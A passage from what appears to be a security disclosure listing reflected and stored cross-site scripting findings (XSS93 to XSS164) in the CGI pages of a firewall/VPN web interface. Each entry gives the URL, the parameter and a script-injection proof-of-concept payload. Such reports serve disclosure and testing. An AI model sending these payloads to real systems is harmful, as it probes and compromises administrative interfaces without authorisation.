|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
IKE_LIFETIME
|
|
|
|
PAYLOAD
|
|
'><script>alert(92)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS93 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/vpnmain.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
ESP_ENCRYPTION
|
|
|
|
PAYLOAD
|
|
'><script>alert(93)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS94 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/vpnmain.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
ESP_INTEGRITY
|
|
|
|
PAYLOAD
|
|
'><script>alert(94)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS95 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/vpnmain.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
ESP_GROUPTYPE
|
|
|
|
PAYLOAD
|
|
'"><script>alert(95)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS96 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/vpnmain.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
ESP_KEYLIFE
|
|
|
|
PAYLOAD
|
|
'><script>alert(96)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS97 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/vpnmain.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
COMPRESSION
|
|
|
|
PAYLOAD
|
|
'><script>alert(97)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS98 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/vpnmain.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
ONLY_PROPOSED
|
|
|
|
PAYLOAD
|
|
'><script>alert(98)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS99 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/vpnmain.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
PFS
|
|
|
|
PAYLOAD
|
|
'><script>alert(99)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS100 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/vpnmain.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
DPD_ACTION
|
|
|
|
PAYLOAD
|
|
'><script>alert(100)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS101 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/vpnmain.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
DPD_DELAY
|
|
|
|
PAYLOAD
|
|
'><script>alert(101)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS102 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/vpnmain.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
DPD_TIMEOUT
|
|
|
|
PAYLOAD
|
|
'><script>alert(102)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS103 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/vpnmain.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
FORCE_MOBIKE
|
|
|
|
PAYLOAD
|
|
'><script>alert(103)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS104 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/vpnmain.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
NAME
|
|
|
|
PAYLOAD
|
|
'><script>alert(104)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS105 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/vpnmain.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
LOCAL_SUBNET
|
|
|
|
PAYLOAD
|
|
'><script>alert(105)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS106 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/vpnmain.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
REMOTE
|
|
|
|
PAYLOAD
|
|
'><script>alert(106)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS107 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/vpnmain.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
LOCAL_ID
|
|
|
|
PAYLOAD
|
|
'><script>alert(107)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS108 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/vpnmain.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
REMOTE_ID
|
|
|
|
PAYLOAD
|
|
'><script>alert(108)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS109 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/vpnmain.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
PSK
|
|
|
|
PAYLOAD
|
|
'><script>alert(109)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS110 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/vpnmain.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
ROOTCERT_ORGANIZATION
|
|
|
|
PAYLOAD
|
|
'><script>alert(110)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS111 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/vpnmain.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
ROOTCERT_HOSTNAME
|
|
|
|
PAYLOAD
|
|
'><script>alert(111)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS112 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/vpnmain.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
ROOTCERT_EMAIL
|
|
|
|
PAYLOAD
|
|
'><script>alert(112)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS113 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/vpnmain.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
ROOTCERT_OU
|
|
|
|
PAYLOAD
|
|
'><script>alert(113)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS114 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/vpnmain.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
ROOTCERT_CITY
|
|
|
|
PAYLOAD
|
|
'><script>alert(114)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS115 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/vpnmain.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
ROOTCERT_STATE
|
|
|
|
PAYLOAD
|
|
'><script>alert(115)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS116 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/vpnmain.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
SUBJECTALTNAME
|
|
|
|
PAYLOAD
|
|
'><script>alert(116)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS117 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/vpnmain.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
P12_PASS
|
|
|
|
PAYLOAD
|
|
'><script>alert(117)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS118 | Stored
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/ovpnmain.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
VPN_IP
|
|
|
|
PAYLOAD
|
|
'><script>alert(118)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS119 | Stored
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/ovpnmain.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
DMTU
|
|
|
|
PAYLOAD
|
|
'><script>alert(119)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS120 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/ovpnmain.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
ccdname
|
|
|
|
PAYLOAD
|
|
'><script>alert(120)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS121 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/ovpnmain.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
ccdsubnet
|
|
|
|
PAYLOAD
|
|
'><script>alert(121)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS122 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/ovpnmain.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
DOVPN_SUBNET
|
|
|
|
PAYLOAD
|
|
'><script>alert(122)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS123 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/ovpnmain.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
DHCP_DOMAIN
|
|
|
|
PAYLOAD
|
|
'><script>alert(123)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS124 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/ovpnmain.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
DHCP_DNS
|
|
|
|
PAYLOAD
|
|
'><script>alert(124)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS125 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/ovpnmain.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
DHCP_WINS
|
|
|
|
PAYLOAD
|
|
'><script>alert(125)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS126 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/ovpnmain.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
ROUTES_PUSH
|
|
|
|
PAYLOAD
|
|
'><script>alert(126)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS127 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/ovpnmain.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
FRAGMENT
|
|
|
|
PAYLOAD
|
|
'><script>alert(127)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS128 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/ovpnmain.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
KEEPALIVE_1
|
|
|
|
PAYLOAD
|
|
'><script>alert(128)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS129 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/ovpnmain.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
KEEPALIVE_2
|
|
|
|
PAYLOAD
|
|
'><script>alert(129)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS130 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/ddns.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
ID
|
|
|
|
PAYLOAD
|
|
'><script>alert(130)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS131 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/ddns.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
HOSTNAME
|
|
|
|
PAYLOAD
|
|
'><script>alert(131)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS132 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/ddns.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
LOGIN
|
|
|
|
PAYLOAD
|
|
'><script>alert(132)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS133 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/ddns.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
PASSWORD
|
|
|
|
PAYLOAD
|
|
'><script>alert(133)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS134 | Stored
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/time.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
NTP_ADDR_1
|
|
|
|
PAYLOAD
|
|
'><script>alert(134)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS135 | Stored
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/time.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
NTP_ADDR_2
|
|
|
|
PAYLOAD
|
|
'><script>alert(135)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS136 | Stored
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/time.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
UPDATE_VALUE
|
|
|
|
PAYLOAD
|
|
'><script>alert(136)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS137 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/ids.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
OINKCODE
|
|
|
|
PAYLOAD
|
|
'><script>alert(137)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS138 | Stored
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/extrahd.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
FS
|
|
|
|
PAYLOAD
|
|
'><script>alert(138)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS139 | Stored
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/extrahd.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
PATH
|
|
|
|
PAYLOAD
|
|
'><script>alert(139)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS140 | Stored
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/extrahd.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
UUID
|
|
|
|
PAYLOAD
|
|
'><script>alert(140)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS141 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/firewall.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
src_addr
|
|
|
|
PAYLOAD
|
|
'><script>alert(141)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS142 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/firewall.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
tgt_addr
|
|
|
|
PAYLOAD
|
|
'><script>alert(142)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS143 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/firewall.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
SRC_PORT
|
|
|
|
PAYLOAD
|
|
'><script>alert(143)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS144 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/firewall.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
TGT_PORT
|
|
|
|
PAYLOAD
|
|
'"><script>alert(144)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS145 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/firewall.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
ruleremark
|
|
|
|
PAYLOAD
|
|
'><script>alert(145)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS146 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/fwhosts.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
HOSTNAME
|
|
|
|
PAYLOAD
|
|
'><script>alert(146)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS147 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/fwhosts.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
IP
|
|
|
|
PAYLOAD
|
|
'><script>alert(147)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS148 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/fwhosts.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
SUBNET
|
|
|
|
PAYLOAD
|
|
'><script>alert(148)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS149 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/fwhosts.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
NETREMARK
|
|
|
|
PAYLOAD
|
|
'><script>alert(149)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS150 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/fwhosts.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
HOSTREMARK
|
|
|
|
PAYLOAD
|
|
'><script>alert(150)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS151 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/fwhosts.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
newhost
|
|
|
|
PAYLOAD
|
|
'><script>alert(151)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS152 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/fwhosts.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
grp_name
|
|
|
|
PAYLOAD
|
|
'><script>alert(152)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS153 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/fwhosts.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
remark
|
|
|
|
PAYLOAD
|
|
'><script>alert(153)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS154 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/fwhosts.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
SRV_NAME
|
|
|
|
PAYLOAD
|
|
'><script>alert(154)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS155 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/fwhosts.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
SRV_PORT
|
|
|
|
PAYLOAD
|
|
'><script>alert(155)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS156 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/fwhosts.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
SRVGRP_NAME
|
|
|
|
PAYLOAD
|
|
'><script>alert(156)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS157 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/fwhosts.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
SRVGRP_REMARK
|
|
|
|
PAYLOAD
|
|
'><script>alert(157)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS158 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/fwhosts.cgi
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
updatesrvgrp
|
|
|
|
PAYLOAD
|
|
'><script>alert(158)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS159 | Stored
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/logs.cgi/config.dat
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
ENABLE_REMOTELOG
|
|
|
|
PAYLOAD
|
|
'><script>alert(159)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS160 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/logs.cgi/proxylog.dat
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
FILTER
|
|
|
|
PAYLOAD
|
|
'><script>alert(160)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS161 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/logs.cgi/firewalllogip.dat
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
pienumber
|
|
|
|
PAYLOAD
|
|
'><script>alert(161)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS162 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/logs.cgi/firewalllogport.dat
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
pienumber
|
|
|
|
PAYLOAD
|
|
'><script>alert(162)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS163 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/logs.cgi/firewalllogcountry.dat
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
pienumber
|
|
|
|
PAYLOAD
|
|
'><script>alert(163)</script>
|
|
|
|
#################################################################################
|
|
|
|
XSS164 | Reflected
|
|
|
|
URL
|
|
https://192.168.2.200:444/cgi-bin/logs.cgi/log.dat
|
|
|
|
METHOD
|
|
Post
|
|
|
|
PARAMETER
|
|
SECTION
|
|
|
|
PAYLOAD
|
|
'><script>alert(164)</script>
|
|
|
|
################################################################################# |